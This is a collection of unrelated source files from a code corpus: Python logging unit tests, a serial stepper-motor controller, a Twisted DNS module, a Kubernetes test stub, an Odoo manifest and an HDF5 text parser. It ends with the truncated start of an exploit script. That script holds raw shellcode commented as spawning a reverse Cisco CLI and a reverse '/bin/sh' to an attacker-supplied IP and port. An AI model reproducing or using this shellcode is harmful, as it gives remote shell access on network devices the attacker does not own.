print '\ntestLogs2JSON_HappyPath'
testData = gen_happy_path()
#print 'testData:\n' + testData
f = tempfile.NamedTemporaryFile(delete=True)
f.write(testData)
f.flush()
try:
lf = logFilter.LogFilterJSON({})
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
json_data = lf.log_file_2_JSON(f.name)
f.close()
# Pretty print json
py_internal = json.loads(json_data)
#print json.dumps(py_internal, sort_keys=True, indent=4,
# separators=(',', ':'))
self.failUnless(py_internal[0]['level'] == 'DEBUG')
self.failUnless(py_internal[0]['temp'] == '34.5')
self.failUnless(py_internal[1]['level'] == 'CMD')
self.failUnless(py_internal[1]['temp'] == '34.5')
self.failUnless(py_internal[1]['item'] == 'Good Stuff')
@fcnName
def testLogs2JSON_Mixed(self):
print '\ntestLogs2JSON_Missing'
testData = gen_mixed_data()
f = tempfile.NamedTemporaryFile(delete=True)
f.write(testData)
f.flush()
# Filter out to WARNING and above.
log_filters = logFilter.LogFilters.copy()
log_filters['level'] = 'WARNING'
try:
lf = logFilter.LogFilterJSON(log_filters)
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
json_data = lf.log_file_2_JSON(f.name)
f.close()
# Pretty print json
json_internal = json.loads(json_data)
"""
print json.dumps(json_internal, sort_keys=True, indent=4,
separators=(',', ':'))
"""
self.failUnless(json_internal[0]['level'] == 'ERROR')
self.failUnless(json_internal[0]['device'] == 'water01')
self.failUnless(json_internal[0]['state'] == 'LOW')
@fcnName
def testLogs2JSON_Bogus_filename(self):
print '\ntestLogs2JSON_Bogus_filename'
log_filters = logFilter.LogFilters.copy()
try:
lf = logFilter.LogFilterJSON(log_filters)
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
result = lf.log_file_2_JSON('/QQQ/ZZZ.bogus')
self.failUnless(result is None)
@fcnName
def countKeyValueJSON(json_struct, key, value):
"""
Count the number of keys with specified value in json_struct.
"""
count = 0
for item in json_struct:
if key in item:
if item[key] == value:
count += 1
return count
class TestLogLevelsPriorities(unittest.TestCase):
# python -m unittest testLogging.TestLogLevelsPriorities
@fcnName
def testCycles(self):
"""Test the cycle priority changes."""
new_level = cycle_priority('DEBUG')
self.failUnless(new_level == 'INFO')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'WARNING')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'CMD')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'ERROR')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'CRITICAL')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'DEBUG')
# Garbage level name results in DEBUG
new_level = cycle_priority('FOO_BAR')
self.failUnless(new_level == 'DEBUG')
# Garbage level name results in DEBUG
@fcnName
def testDebugLevel(self):
debug_dict = utils.filter_priority('DEBUG')
self.failUnless('DEBUG' in debug_dict)
self.failUnless('CRITICAL' in debug_dict)
@fcnName
def testWarningLevel(self):
debug_dict = utils.filter_priority('WARNING')
self.failUnless('DEBUG' not in debug_dict)
self.failUnless('WARNING' in debug_dict)
self.failUnless('ERROR' in debug_dict)
self.failUnless('CRITICAL' in debug_dict)
@fcnName
def testERRORLevel_0(self):
debug_dict = utils.filter_priority('ERROR')
self.failUnless('DEBUG' not in debug_dict)
self.failUnless('INFO' not in debug_dict)
self.failUnless('WARNING' not in debug_dict)
self.failUnless('ERROR' in debug_dict)
self.failUnless('CRITICAL' in debug_dict)
@fcnName
def testCRITICALLevel_0(self):
debug_dict = utils.filter_priority('CRITICAL')
self.failUnless('DEBUG' not in debug_dict)
self.failUnless('INFO' not in debug_dict)
self.failUnless('WARNING' not in debug_dict)
self.failUnless('ERROR' not in debug_dict)
self.failUnless('CRITICAL' in debug_dict)
@fcnName
def testErrorLevelJSON_1(self):
print '\ntestErrorLevelJSON - filter to >= ERROR'
testData = gen_happy_path()
testData += gen_missing_data();
f = tempfile.NamedTemporaryFile(delete=True)
f.write(testData)
f.flush()
log_filters = logFilter.LogFilters.copy()
log_filters['level'] = 'ERROR'
try:
lf = logFilter.LogFilterJSON(log_filters)
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return
json_data = lf.log_file_2_JSON(f.name)
f.close()
json_internal = json.loads(json_data)
"""
# Pretty print json
print json.dumps(json_internal, sort_keys=True, indent=4,
separators=(',', ':'))
"""
num_debug = countKeyValueJSON(json_internal, 'level', 'DEBUG')
self.failUnless(num_debug == 0)
num_info = countKeyValueJSON(json_internal, 'level', 'INFO')
self.failUnless(num_info == 0)
num_warnings = countKeyValueJSON(json_internal, 'level', 'WARNING')
self.failUnless(num_warnings == 0)
num_error = countKeyValueJSON(json_internal, 'level', 'ERROR')
self.failUnless(num_error > 0)
num_critical = countKeyValueJSON(json_internal, 'level', 'CRITICAL')
self.failUnless(num_critical > 0)
self.failUnless(json_internal[0]['level'] == 'ERROR')
self.failUnless(json_internal[0]['temp'] == '999')
@fcnName
def testCRITICALLevel_BogusLevel(self):
"""Test an invalid logging level"""
bogusDict = utils.filter_priority('BOGUS')
self.failUnless(bogusDict == utils.LOG_LEVELS.keys())
class TestDirectoryService(unittest.TestCase):
"""
Test the various functions of a directory
service.
"""
# python -m unittest testLogging.TestDirectoryService
# Use standard ports to allow test to
# proceed without worrying about existing
# logCollectors or directory services..
LOG_PORT = logConfig.get_logging_port()
log_collector = None # Process for log collector
logConfig.DIR_PORT = logConfig.get_directory_port()
DIR_SVC_PORT = logConfig.get_directory_port()
dir_svc = None # Process for directory services
# True if logCollector was started, else False
LOG_COLLECTOR_STARTED = False
# True if directory services already runing, else False
DIRECTORY_SERVICE_STARTED = False
@fcnName
def setUp(self):
"""
Start logCollector and dirSvc only it they are not
currently running.
"""
# Setup log collector object
# TBD: Does this track changing ports? TODO BUG?
self.log_client = loggingClientTask.LoggingClientClass(platform.node())
self.log_client.start()
log_entry = 'Starting=TestDirectoryService,log_port=%d' % \
TestDirectoryService.LOG_PORT
self.log_client.info(log_entry)
if listeningPort.is_listening(TestDirectoryService.LOG_PORT):
sys.stdout.write('logCollector already running.\n')
else:
sys.stdout.write('--- TestDirectoryService: setUp() port %s\n' %
TestDirectoryService.LOG_PORT)
self.StartLogServer()
sys.stdout.write('--- TestDirectoryService: logCollector setUp()\n')
time.sleep(1)
if listeningPort.is_listening(TestDirectoryService.DIR_SVC_PORT):
sys.stdout.write('dirSvc already running.\n')
else:
sys.stdout.write('--- TestDirectoryService: dirSvc setUp() port %s\n' %
TestDirectoryService.DIR_SVC_PORT)
self.StartDirService()
sys.stdout.write('--- setUp() finished.\n')
time.sleep(1)
self.testDirClient = dirClient.DirClient(in_config={
'clear': True,
'memory_filename': './dirSvc.data',
'port': str(logConfig.DIR_PORT),
'noisy': True,
})
@fcnName
def tearDown(self):
sys.stdout.write('--- Kill the dirSvc before the logCollector. ---\n')
sys.stdout.write('--- TestDirectoryService: dirSvc tearDown()')
self.KillDirService()
sys.stdout.write('--- TestDirectoryService: logCollector tearDown()')
self.KillLogServer()
@fcnName
def StartLogServer(self):
"""
Spawn the log server in their own
separate procsses.
"""
log_port = TestDirectoryService.LOG_PORT
print '------ LOG Collector starting ------'
abs_log_collector = os.path.abspath(logCollector.__file__)
log_filename = os.path.abspath('./logs.log')
print 'log_filename:%s' % log_filename
# Remove existing log file
# Other tests will test for append mode.
if os.path.exists(log_filename) and \
os.path.isfile(log_filename):
os.remove(log_filename)
log_port = TestDirectoryService.LOG_PORT
args = ['python',
abs_log_collector,
'--noisy', # Echo logs to console
'--port=%s' % str(log_port),
'--log-file=%s' % log_filename,
]
print 'starting logCollector:%s' % ' '.join(args)
argv_collector = args
TestDirectoryService.log_collector = subprocess.Popen(argv_collector)
print ' '.join(argv_collector)
print (bcolors.BGGREEN +
('log_collector pid: %d' %
TestDirectoryService.log_collector.pid) +
bcolors.ENDC)
TestDirectoryService.LOG_COLLECTOR_STARTED = True
@fcnName
def StartDirService(self):
"""
Start the directory service. If already
running, ignore this request.
"""
dir_svc_port = TestDirectoryService.DIR_SVC_PORT
print '------ Directory Service starting ------'
abs_dir_service = os.path.abspath(dirSvc.__file__)
argv_client = ['python',
abs_dir_service,
'--port=%s' % str(dir_svc_port),
'--memory-file=%s' % './logsDirSvc.log',
'--clear', # Wipe out old data
]
print 'starting dirSvc:' + ' '.join(argv_client)
TestDirectoryService.dir_svc = subprocess.Popen(argv_client,
stderr=subprocess.STDOUT)
print (bcolors.BGGREEN +
('dirSvc pid: %d' % TestDirectoryService.dir_svc.pid) +
bcolors.ENDC)
# Allow some time to process.
seconds_to_sleep = 2
print '%d seconds to process subprocs' % seconds_to_sleep
time.sleep(seconds_to_sleep)
TestDirectoryService.DIRECTORY_SERVICE_STARTED = True
@fcnName
def KillLogServer(self):
"""
Kill the log collector only if the process
was not started by this process.
"""
if TestDirectoryService.LOG_COLLECTOR_STARTED:
print 'killing logCollector at pid %d' % \
TestDirectoryService.log_collector.pid
#os.kill(TestDirectoryService.log_collector.pid, signal.SIGKILL)
self.log_client.info('@EXIT')
time.sleep(1)
else:
print 'Not killing pre-existing logCollector'
@fcnName
def KillDirService(self):
"""
Kill the directory service only if the process
was not started by this process.
"""
if TestDirectoryService.DIRECTORY_SERVICE_STARTED:
print 'killing dirSvc at pid %d' % \
TestDirectoryService.dir_svc.pid
self.testDirClient.port_request('@EXIT')
else:
print 'Not killing pre-existing dirSvc'
@fcnName
def testDirSvc_0(self):
print '---- TestDirectoryService.testDirSvc_0 - starting'
dir_svc = TestDirectoryService.dir_svc
log_col = TestDirectoryService.log_collector
try:
# Clear the directory
print '%s' % self.testDirClient.port_request('@CLEAR')
print 'dirNameBasePort: %s' % logConfig.getDirNameBasePort()
# Add a few names to the directory
req0 = self.testDirClient.port_request('testDirSvc')
req1 = self.testDirClient.port_request('abc')
req2 = self.testDirClient.port_request('xyz')
print 'abc req1=%s' % str(req1)
print 'abc port_request(abc)=%s' % str(self.testDirClient.port_request('abc'))
print '%s' % self.testDirClient.port_request('@DIR')
req1_again = self.testDirClient.port_request('abc')
self.failUnless(req1 == req1_again)
# Delete name abc
print '~abc ' + self.testDirClient.port_request('~abc')
print 'after ~abc @DIR: %s' % self.testDirClient.port_request('@DIR')
# Since 'abc' was deleted, a request yields a new port
self.failUnless(req1 != self.testDirClient.port_request('abc'))
except Exception as err:
sys.stderr.write(str(err) + '\n')
traceback.print_stack()
print '-----------'
traceback.print_exc()
if __name__ == '__main__':
# Standard way to initialize for logging
apiLoggerInit.loggerInit()
#ch = logging.StreamHandler(sys.stdout)
#log = logging.getLogger('')
#log.addHandler(ch)
logging.info('Unit test started')
#suite = unittest.TestLoader().loadTestsFromTestCase(RunTests)
#unittest.TextTestRunner(verbosity=2).run(suite)
unittest.main()
| TrailingDots/async_py_messaging | async_py_messaging/test/testLogging.py | Python | gpl-3.0 | 35,340 |
from numpy import int_
from platform import system
import serial, time, glob
import sys
def disp_ports():
print "Found ports:"
for name in list_serial_ports(): print name
def list_serial_ports():
if system() == 'Windows':
# Scan for avilable ports
available = []
for ix in range(256):
try:
s = serial.Serial(ix)
available.append((ix, s.portstr))
s.close()
except serial.SerialException:
pass
return available
elif system() == 'Darwin': # Mac
return glob.glob('/dev/tty*') + glob.glob('dev/cu*')
elif system() == 'Linux':
return glob.glob('/dev/ttyS*') + glob.glob('/dev.ttyUSB*')
def reply_bytes_to_data(rpl_bytes):
rpl_data = 256**3 * rpl_bytes[5] + 256**2 * \
rpl_bytes[4] + 256 * rpl_bytes[3] + rpl_bytes[2]
if rpl_bytes[5] > 127:
rpl_data = rpl_data - 256**4 # Handles negative data
return(rpl_data )
def send( inst, ser ):
# send instruction
# inst must be a list of 6 bytes (no error checking)
for i in range (6):
ser.write(chr(inst[i]))
return
def receive(ser):
# return 6 bytes from the receive buffer
# there must be 6 bytes to receive (no error checking)
nbytes = 6
r = [0]*nbytes
for i in range(nbytes):
r[i] = ord(ser.read(1))
return r
def motor_specs(model = 'NM17C12S-MC6'):
m_specs = {}
if model == 'NM17C12S-MC6':
m_specs['microstep_sz'] = 0.028125 # Default resolution, degrees
m_specs['max_speed'] = 7910 # Degree/s
m_specs['min_speed'] = 0.1318 # Degree/s
m_specs['speed_resolution'] = 0.1318 # Degree/s
m_specs['motor_steps_per_rev'] = 200
else:
print 'Data for the model is lacking'
return m_specs
def stage_specs():
"""
Specifications for individual xy-stages
"""
# TODO: make better
s_specs = {'um_per_turn': 2000.0/3}
return s_specs
def microns_to_microsteps(um, model='NM17C12S-MC6'):
"""
Parameters
----------
um - microns
model - model of motor connected to T-MCA
Returns
-------
n_microsteps - number of microsteps to move um microns
"""
# Full turn: 2000.0/3 um
# step: 100 um -> 100 / (2000.0/3) turns (approx 0.15)
# step in degrees: 0.15 * 360
# in microsteps: 0.15 * 360 / m_specs['microstep_sz']
s_specs = stage_specs()
m_specs = motor_specs(model)
n_microsteps = int_(round((um/s_specs['um_per_turn']*360) /
m_specs['microstep_sz']))
return n_microsteps
def experiment_default_settings(ser, model='NM17C12S-MC6', verbose=True):
m_specs = motor_specs(model)
target_speed = 2.0 # Degree/s
target_speed_bytes = cmd_data_to_bytes(
int_(round(target_speed * 1.6384 / m_specs['microstep_sz'])))
if verbose:
print 'Target speed is set to: ', target_speed, 'degree/s.'
print 'The command bytes are: ', target_speed_bytes
instruction = [1, 42]
instruction.extend(target_speed_bytes)
if verbose:
print instruction
send(instruction, ser)
instruction[0] = 2
if verbose:
print instruction
send(instruction, ser)
acceleration = 100 # Degree/s
acc_bytes = cmd_data_to_bytes(
int_(round(acceleration/(10000/1.6384*m_specs['microstep_sz']))))
if verbose:
print 'Acceleration is set to: ', acceleration, 'degreee/s^2.'
print 'The command bytes are: ', acc_bytes
instruction = [1, 43]
instruction.extend(acc_bytes)
if verbose:
print instruction
send(instruction, ser)
instruction[0] = 2
if verbose:
print instruction
send(instruction, ser)
# TODO: set max relative move, cmd 46
def cmd_data_to_bytes(cmd_data):
cmd_bytes = [0, 0, 0, 0]
if cmd_data < 0: # Handles negative data
cmd_data = 256**4 + cmd_data
cmd_bytes[3] = cmd_data / 256**3
cmd_data = cmd_data - 256**3 * cmd_bytes[3]
cmd_bytes[2] = cmd_data / 256**2
cmd_data = cmd_data - 256**2 * cmd_bytes[2]
cmd_bytes[1] = cmd_data / 256
cmd_data = cmd_data - 256 * cmd_bytes[1]
cmd_bytes[0] = cmd_data
return cmd_bytes
def init_connection(port='COM5', verbose=True):
# Open serial port
try:
ser = serial.Serial(port, 9600, 8, 'N', 1, timeout=5)
except:
print 'Error opening serial port. Quitting.'
return sys.exit(0)
if verbose:
print "Opening " + ser.portstr
# Renumber devices
instruction = [0, 2, 0, 0, 0, 0] # All devices renumber (must be done if a
# new device was added or removed from the
# daisy chain)
if verbose:
print "Sending renumbering instruction: ", instruction
send(instruction, ser)
time.sleep(1)
return ser
def move(ser, x_dist=0, y_dist=0, verbose=False):
"""
Move the stage a relative distance specified by x_dist and y_dist.
ser : ABCMeta, open comm port
x_dist : distance to move in microns
y_dist : distance to move in microns
verbose : print communication with devices
TODO:
set max relative move (cmd 46)
Parameters
----------
Returns
-------
"""
x_step = 0
y_step = 0
# If x/y_dist is positive then max_x/y_step will be positive, if x/y_dist
# is negative then max_x/y_step will be negative.
if x_dist != 0:
max_x_step = 500 * x_dist/abs(x_dist)
if y_dist !=0:
max_y_step = 500 * y_dist/abs(y_dist)
while abs(x_dist) > 0:
if (abs(max_x_step) - abs(x_dist)) < 0:
x_step = max_x_step
x_dist = x_dist - max_x_step
else:
x_step = x_dist
x_dist = 0
instruction = [1, 21]
# From microns to microsteps
instruction.extend(cmd_data_to_bytes(microns_to_microsteps(x_step)))
send(instruction, ser)
time.sleep(10.0 * x_step/max_x_step)
if verbose:
try:
reply = receive(ser)
print 'Instruction sent: ', instruction
print 'Device number: ', reply[0]
print 'Command number: ', reply[1]
print 'Supply voltage: ', reply[2]/10.0, 'V'
print 'Data: ', reply_bytes_to_data( reply )
except:
print "No reply was received."
while abs(y_dist) > 0:
if (abs(max_y_step) - abs(y_dist)) < 0:
y_step = max_y_step
y_dist = y_dist - max_y_step
else:
y_step = y_dist
y_dist = 0
instruction = [2, 21]
# From microns to microsteps
instruction.extend(cmd_data_to_bytes(microns_to_microsteps(y_step)))
send(instruction, ser)
time.sleep(10.0 * y_step/max_y_step)
if verbose:
try:
### command number 255: ERROR!
reply = receive(ser)
print 'Instruction sent: ', instruction
print 'Device number: ', reply[0]
print 'Command number: ', reply[1]
print 'Supply voltage: ', reply[2]/10.0, 'V'
print 'Data: ', reply_bytes_to_data(reply)
except:
print "No reply was received."
def solitary_move(x_dist=0, y_dist=0, verbose=False, port='COM5'):
"""
Initiate port move the stage a distance specified by x_dist and y_dist and
close port.
x_dist : distance to move in microns
y_dist : distance to move in microns
verbose : print communication with devices
port : { string, defalut: COM1 (linux:/dev/ttyUSB0) }
TODO:
set max relative move (cmd 46)
Parameters
----------
Returns
-------
"""
# open serial port
# replace "/dev/ttyUSB0" with "COM1", "COM2", etc in Windows
try:
ser = serial.Serial(port, 9600, 8, 'N', 1, timeout=5)
except:
print "Error opening serial port. Quitting."
return sys.exit(0)
print "Opened " + ser.portstr
move(ser, x_dist, y_dist)
print "Closing " + ser.portstr
ser.close()
def test(port='COM5', instruction=[1, 52, 0, 0, 0, 0]):
"""
Tests communication with T-MCA Stepper Motor Controllers
Parameters
----------
port : { string, defalut: /dev/ttyUSB0 }
"""
# open serial port
# replace "/dev/ttyUSB0" with "COM1", "COM2", etc in Windows
try:
ser = serial.Serial(port, 9600, 8, 'N', 1, timeout=5)
except:
print "Error opening serial port. Quitting."
return sys.exit(0)
print "Opening " + ser.portstr
# Byte 1 - Device number
# Byte 2 - Command number
# Byte 3 - Data - Least Significant Byte (LSB)
# Byte 4 - Data
# Byte 5 - Data
# Byte 6 - Data - Most Significant Byte (MSB)
#instruction = [1,21,20,0,0,0] # move 1st motor 20 steps
#instruction = [1,52,0,0,0,0] # return power supply voltage
#instruction = [0,2,0,0,0,0] # All devices renumber (must
# be done if a new device was
# added or removed from the
# daisy chain)
print "Sending instruction", instruction
send(instruction, ser)
time.sleep(1) # wait for 1 second
try:
reply = receive(ser)
print "Receiving reply", reply
print "Device number:", reply[0]
print "Command number:", reply[1]
print "Supply voltage:", reply[2]/10.0, "V"
print 'Data: ', reply_bytes_to_data(reply)
except:
print "No reply was received."
print "Closing " + ser.portstr
ser.close()
| kalleknast/GU_scan | tmca_control.py | Python | mit | 10,007 |
# -*- test-case-name: twisted.names.test.test_names -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from __future__ import absolute_import, division
__all__ = ['SecondaryAuthority', 'SecondaryAuthorityService']
from twisted.internet import task, defer
from twisted.names import dns
from twisted.names import common
from twisted.names import client
from twisted.names import resolve
from twisted.names.authority import FileAuthority
from twisted.python import log, failure
from twisted.application import service
class SecondaryAuthorityService(service.Service):
calls = None
_port = 53
def __init__(self, primary, domains):
"""
@param primary: The IP address of the server from which to perform
zone transfers.
@type primary: L{str}
@param domains: A sequence of domain names for which to perform
zone transfers.
@type domains: L{list} of L{bytes}
"""
self.primary = primary
self.domains = [SecondaryAuthority(primary, d) for d in domains]
@classmethod
def fromServerAddressAndDomains(cls, serverAddress, domains):
"""
Construct a new L{SecondaryAuthorityService} from a tuple giving a
server address and a C{str} giving the name of a domain for which this
is an authority.
@param serverAddress: A two-tuple, the first element of which is a
C{str} giving an IP address and the second element of which is a
C{int} giving a port number. Together, these define where zone
transfers will be attempted from.
@param domain: A C{bytes} giving the domain to transfer.
@return: A new instance of L{SecondaryAuthorityService}.
"""
service = cls(None, [])
service.primary = serverAddress[0]
service._port = serverAddress[1]
service.domains = [
SecondaryAuthority.fromServerAddressAndDomain(serverAddress, d)
for d in domains]
return service
def getAuthority(self):
return resolve.ResolverChain(self.domains)
def startService(self):
service.Service.startService(self)
self.calls = [task.LoopingCall(d.transfer) for d in self.domains]
i = 0
from twisted.internet import reactor
for c in self.calls:
# XXX Add errbacks, respect proper timeouts
reactor.callLater(i, c.start, 60 * 60)
i += 1
def stopService(self):
service.Service.stopService(self)
for c in self.calls:
c.stop()
class SecondaryAuthority(FileAuthority):
"""
An Authority that keeps itself updated by performing zone transfers.
@ivar primary: The IP address of the server from which zone transfers will
be attempted.
@type primary: C{str}
@ivar _port: The port number of the server from which zone transfers will be
attempted.
@type: C{int}
@ivar _reactor: The reactor to use to perform the zone transfers, or L{None}
to use the global reactor.
"""
transferring = False
soa = records = None
_port = 53
_reactor = None
def __init__(self, primaryIP, domain):
"""
@param domain: The domain for which this will be the secondary
authority.
@type domain: L{bytes}
"""
# Yep. Skip over FileAuthority.__init__. This is a hack until we have
# a good composition-based API for the complicated DNS record lookup
# logic we want to share.
common.ResolverBase.__init__(self)
self.primary = primaryIP
self.domain = domain
@classmethod
def fromServerAddressAndDomain(cls, serverAddress, domain):
"""
Construct a new L{SecondaryAuthority} from a tuple giving a server
address and a C{bytes} giving the name of a domain for which this is an
authority.
@param serverAddress: A two-tuple, the first element of which is a
C{str} giving an IP address and the second element of which is a
C{int} giving a port number. Together, these define where zone
transfers will be attempted from.
@param domain: A C{bytes} giving the domain to transfer.
@return: A new instance of L{SecondaryAuthority}.
"""
secondary = cls(None, None)
secondary.primary = serverAddress[0]
secondary._port = serverAddress[1]
secondary.domain = domain
return secondary
def transfer(self):
if self.transferring:
return
self.transfering = True
reactor = self._reactor
if reactor is None:
from twisted.internet import reactor
resolver = client.Resolver(
servers=[(self.primary, self._port)], reactor=reactor)
return resolver.lookupZone(self.domain
).addCallback(self._cbZone
).addErrback(self._ebZone
)
def _lookup(self, name, cls, type, timeout=None):
if not self.soa or not self.records:
return defer.fail(failure.Failure(dns.DomainError(name)))
return FileAuthority._lookup(self, name, cls, type, timeout)
def _cbZone(self, zone):
ans, _, _ = zone
self.records = r = {}
for rec in ans:
if not self.soa and rec.type == dns.SOA:
self.soa = (str(rec.name).lower(), rec.payload)
else:
r.setdefault(str(rec.name).lower(), []).append(rec.payload)
def _ebZone(self, failure):
log.msg("Updating %s from %s failed during zone transfer" % (self.domain, self.primary))
log.err(failure)
def update(self):
self.transfer().addCallbacks(self._cbTransferred, self._ebTransferred)
def _cbTransferred(self, result):
self.transferring = False
def _ebTransferred(self, failure):
self.transferred = False
log.msg("Transferring %s from %s failed after zone transfer" % (self.domain, self.primary))
log.err(failure)
| EricMuller/mynotes-backend | requirements/twisted/Twisted-17.1.0/src/twisted/names/secondary.py | Python | mit | 6,085 |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.batch_api import BatchApi
class TestBatchApi(unittest.TestCase):
""" BatchApi unit test stubs """
def setUp(self):
self.api = kubernetes.client.apis.batch_api.BatchApi()
def tearDown(self):
pass
def test_get_api_group(self):
"""
Test case for get_api_group
"""
pass
if __name__ == '__main__':
unittest.main()
| djkonro/client-python | kubernetes/test/test_batch_api.py | Python | apache-2.0 | 830 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2014 Didotech SRL (info at didotech.com)
# All Rights Reserved.
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
{
"name": "Export Customers - Exporting customer's data in .csv file for italian fiscal program.",
'version': '2.0.1.0',
'category': 'Generic Modules/Sales customers',
"description": """Exporting customer's data in .csv file """,
"author": "Didotech SRL",
'website': 'http://www.didotech.com',
"depends": [
"base",
"base_partner_ref",
"sale",
"account",
#"l10n_it",
"l10n_it_base",
"l10n_it_account"
],
"init_xml": [],
"update_xml": [
"security/security.xml",
"export_customers.xml"
],
"demo_xml": [],
"installable": True,
"active": False,
}
| iw3hxn/LibrERP | export_customers/__openerp__.py | Python | agpl-3.0 | 2,043 |
import numpy as np
import h5py
# value is a list
# converts anything numeric into a float
def processMetadataValue(value):
if len(value) < 2:
return ''
try:
return float(value[1])
except ValueError:
return value[1]
# a fuction to parse txtXY files
# will parse files with or without metadata
# probably pretty inefficient, but easy to read :)
def parseTxtXY(filename):
with open(filename, "r") as file:
rawdata=file.readlines()
# strip all whitespace except tabs
rawdata = [s.replace(" ", "") for s in rawdata]
# get metadata fields
splitNumeric = [s.split('\t') for s in rawdata if s[0] == '-' or ord(s[0]) in range(ord('0'), ord('9'))]
splitMetadata = [s[1:].replace("\n", "").split(':') for s in rawdata if s[0] == '$']
data = np.asarray(splitNumeric).astype(np.double)
metadataKeys = [line[0] for line in splitMetadata]
metadataValues = [processMetadataValue(line) for line in splitMetadata]
metadata = dict(zip(metadataKeys, metadataValues))
return {'data': data, 'metadata': metadata}
# will save a sample file, assuming that the first row is x and subsequent rows are Y
# numData is numpy array, metadata is dictionary
def saveSampleFile(filename, numData, metadata):
# clean metadata of empty entries:
metadata = {key: value for key, value in metadata.items() if value != ''}
with h5py.File(filename, 'w') as outfile:
outfile.create_dataset('x', data=numData[:, 0].astype(np.double)[:, None])
outfile.create_dataset('Y', data=numData[:, 1:].astype(np.double))
for key, value in metadata.items():
if isinstance(value, str):
outfile.attrs[key] = np.string_(value)
else:
outfile.attrs[key] = value
| BiRG/Omics-Dashboard | compute-images/spectra-processing/src/textparsers.py | Python | mit | 1,831 |
#!/usr/bin/env python2.7
import socket
import sys
import struct
import string
import random
import time
# Spawns a reverse cisco CLI
cliShellcode = (
"\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"
"\x8b\x40\x08\x8b\x40\x04\x8b\x00\x85\xc0\x74\x3b\x50\x8b\x40\x08"
"\x8b\x40\x04\x8d\x98\xd8\x00\x00\x00\x58\x81\x3b\xd0\xd4\x00\xe1"
"\x75\xe4\x83\x7b\x04\x31\x74\xde\x89\xd8\x2d\x00\x01\x00\x00\xc7"
"\x40\x04\x03\x01\x00\x00\xc7\x40\x0c\xd0\x00\x00\x00\xc7\x80\xf8"
"\x00\x00\x00\xef\xcd\x1c\xa1\x55\x31\xed\x31\xff\x4f\xbe\x22\x00"
"\x00\x00\xba\x07\x00\x00\x00\xb9\x00\x10\x00\x00\x31\xdb\xb8\xc0"
"\x00\x00\x00\xcd\x80\x5d\x89\xc7\xeb\x26\x5e\xb9\x00\x04\x00\x00"
"\xf3\xa5\x31\xdb\x6a\x03\x68\x00\x20\x00\x00\x53\x50\x68\xfd\xa8"
"\xff\x09\xb8\xf0\xb7\x06\x08\xff\xd0\x83\xc4\x14\x61\x31\xc0\xc3"
"\xe8\xd5\xff\xff\xff\x55\x89\xe5\x81\xec\x10\x04\x00\x00\xe9\xb1"
"\x00\x00\x00\x58\x89\x85\xfc\xfb\xff\xff\x50\xb8\xf0\x07\x07\x08"
"\xff\xd0\x83\xc4\x04\x89\x85\xf8\xfb\xff\xff\x89\xc3\x8b\x43\x04"
"\x68\x80\xee\x36\x00\x68\x1a\x90\x01\x00\x53\xff\x50\x70\xc7\x44"
"\x24\x04\x20\x90\x01\x00\x8b\x43\x04\xff\x50\x70\xc7\x85\xf4\xfb"
"\xff\xff\x00\x40\x00\x00\x8d\x8d\xf4\xfb\xff\xff\x89\x4c\x24\x08"
"\xc7\x44\x24\x04\x21\x90\x01\x00\x89\x1c\x24\x8b\x43\x04\xff\x50"
"\x70\xbe\xc8\xef\xff\xff\x65\x8b\x06\x89\x98\x98\x00\x00\x00\xeb"
"\x3a\xb8\x80\x0a\x0f\x08\xff\xd0\x5b\xc7\x43\x0c\xff\xff\xff\x17"
"\x83\xc3\x14\xc7\x03\x65\x6e\x61\x62\xc7\x43\x04\x6c\x65\x5f\x31"
"\xc7\x43\x08\x35\x00\x00\x00\x6a\x04\x68\x60\xc1\x52\x0a\xb8\x20"
"\x68\x0f\x08\xff\xd0\x89\xec\x5d\x31\xc0\xc3\xe8\xc1\xff\xff\xff"
"\x60\xc1\x52\x0a\xe8\x4a\xff\xff\xfftcp/CONNECT/3/@IP@/@PORT@\x00"
)
# Spawns a reverse "/bin/sh"
shShellcode = (
"\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"
"\x8b\x40\x08\x8b\x40\x04\x8b\x00\x85\xc0\x74\x3b\x50\x8b\x40\x08"
"\x8b\x40\x04\x8d\x98\xd8\x00\x00\x00\x58\x81\x3b\xd0\xd4\x00\xe1"
"\x75\xe4\x83\x7b\x04\x31\x74\xde\x89\xd8\x2d\x00\x01\x00\x00\xc7"
"\x40\x04\x03\x01\x00\x00\xc7\x40\x0c\xd0\x00\x00\x00\xc7\x80\xf8"
"\x00\x00\x00\xef\xcd\x1c\xa1\xb8\x40\xbc\x2a\x09\xff\xd0\x61\xb8"
"\x02\x00\x00\x00\xcd\x80\x85\xc0\x0f\x85\xa1\x01\x00\x00\xba\xed"
"\x01\x00\x00\xb9\xc2\x00\x00\x00\x68\x2f\x73\x68\x00\x68\x2f\x74"
